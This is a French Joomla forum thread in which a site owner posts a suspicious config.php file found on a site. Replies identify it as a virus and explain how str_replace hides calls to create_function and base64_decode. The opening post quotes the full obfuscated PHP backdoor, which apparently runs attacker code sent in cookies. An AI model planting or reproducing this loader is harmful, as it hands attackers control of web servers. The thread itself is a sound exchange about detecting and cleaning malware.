fichier config.php dans la racine d'un site joomla ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] fichier config.php dans la racine d'un site joomla ?

    Bonjour ;

    j'ai trouvé un fichier " config.php " dans la racine d'un site joomla qui contient le code suivant :

    Code:
    \<?php $ej = str_replace("eo","","eoseoteoreo_reoeeopeoleoaeoceoe"); $dd="JGapM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkapYSk9PSdmcycapgJiYgapJGMoJGEappPapjMpe"; $yt="lZ1ap9yZXBsYWNlapKGFycmF5apKapCcvW15cdzap1cc10vJywnL1xapzLycappLCBhcnJheapSgnJywnKycpLapCBqapbap2a"; $se="pluKGFycmF5X3NsaWNaplKapCapRhLCRjKCRhKapS0zapKSkpKapSk7ZWNobyAnapPC8nLapiRrLic+apJzt9"; $uiz="yRrapPSc1Zap2ap16MzapMnO2apVjaG8gJzwnLiapRrLic+JztldmFsapKGapJhc2U2NF9kZWNapvZGUocHJ"; $axb = $ej("z", "", "zbzase6z4z_zdzezczozdze"); $oj = $ej("d","","cdrdeadted_dfdundcdtiodn"); $nfh = $oj("", $axb($ej("ap", "", $dd.$uiz.$yt.$se))); $nfh(); ?>
    est-ce que quelqu'un parmi vous à une idée ?

    Merci

  • #2
    Re : fichier config.php dans la racine d'un site joomla ?

    Bonjour,
    de memoire c'est un fichier configuration.php que Joomla utilise ... et vu ce que je lis dans ton fichier, je pense plutot a un virus ... en tout cas ce n'est pas un fichier core de Joomla
    Vérifie tout le site via FTP, sure que tu y trouveras d'autres fichiers louches !
    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

    Commentaire


    • #3
      Re : fichier config.php dans la racine d'un site joomla ?

      Merci pour tas réponse rapide ;
      c'est évident que c'est louche et je pense que selon d'autres postes par rapport au sujet , c'est une attaque par backdoor ; c'est tout ce que j'ai pour le moment .

      Commentaire


      • #4
        Re : fichier config.php dans la racine d'un site joomla ?

        Bonjour

        Zéro doute, c'est un virus.

        Ton site a été hacké. Regarde par exemple cette portion du code :
        Code:
        $ej("d","","cdrdeadted_dfdundcdtiodn");
        $ej a été défini comme étant la fonction str_replace. Sachant cela, regarde le cdrdeadted_dfdundcdtiodn... Si tu retires les "d", cela donne ... create_function. Ce code obfusqué est un virus.

        Bonne journée et bon nettoyage.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : fichier config.php dans la racine d'un site joomla ?

          Salut,

          Ce type de fichier ne se retrouve pas à la racine des fichiers joomla. Existe un configuration.php mais celui-ci.

          A mon avis... tu dois en avoir bien d'autres!

          Bon courage

          Commentaire

          Annonce

          Réduire
          Aucune annonce pour le moment.

          Partenaire de l'association

          Réduire

          Hébergeur Web PlanetHoster
          Travaille ...
          X